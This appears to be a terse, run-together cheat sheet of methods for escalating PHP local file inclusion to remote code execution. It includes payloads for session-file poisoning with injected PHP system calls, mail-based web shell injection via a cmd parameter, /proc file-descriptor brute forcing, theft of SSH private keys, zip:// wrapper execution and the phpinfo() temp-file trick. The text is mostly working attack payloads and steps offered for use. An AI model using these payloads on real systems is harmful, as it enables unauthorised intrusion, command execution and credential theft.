#Check if the website use PHPSESSIDSet-Cookie:PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/Set-Cookie:user=admin; expires=Tue,30-Jun-202010:25:29GMT; path=/; httponly#Inphpsessionsarestoreinto/var/lib/php5/sess_PHPSESSIDfiles/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";#Set the cookie to <?php system("whoami"); ?>login=1&user=<?phpsystem("whoami");?>&pass=password&lang=en_us.php#Use the LFI to include the PHP session filelogin=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
Email method
#Send a mail to internal account (user@localhost) containing:<?php echo system($_REQUEST["cmd"]); ?>#Access to the mail (/var/mail/USER&cmd=whoami)
/proc/*/fd/* method
#Upload a lot of shellshttp://web.com/index.php?page=/proc/$PID/fd/$FD#$PID = PID of the proccess (can be bruteforced)#$FD = filedescriptor (can be bruteforced)
Ssh method
#Check which user is being used (/proc/self/status - /etc/passwd)/home/hax0r/.ssh/id_rsa#hax0r = User is being used
Using a zip upload
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application
4. Trigger the RCE:
https://site.com/index.php?page=zip://path/file.zip%23rce.php
Phpinfo() method
To exploit this you need: page where phpinfo() is displayed, "file_uploads=on" and the server has to be able to write in "/tmp" directory.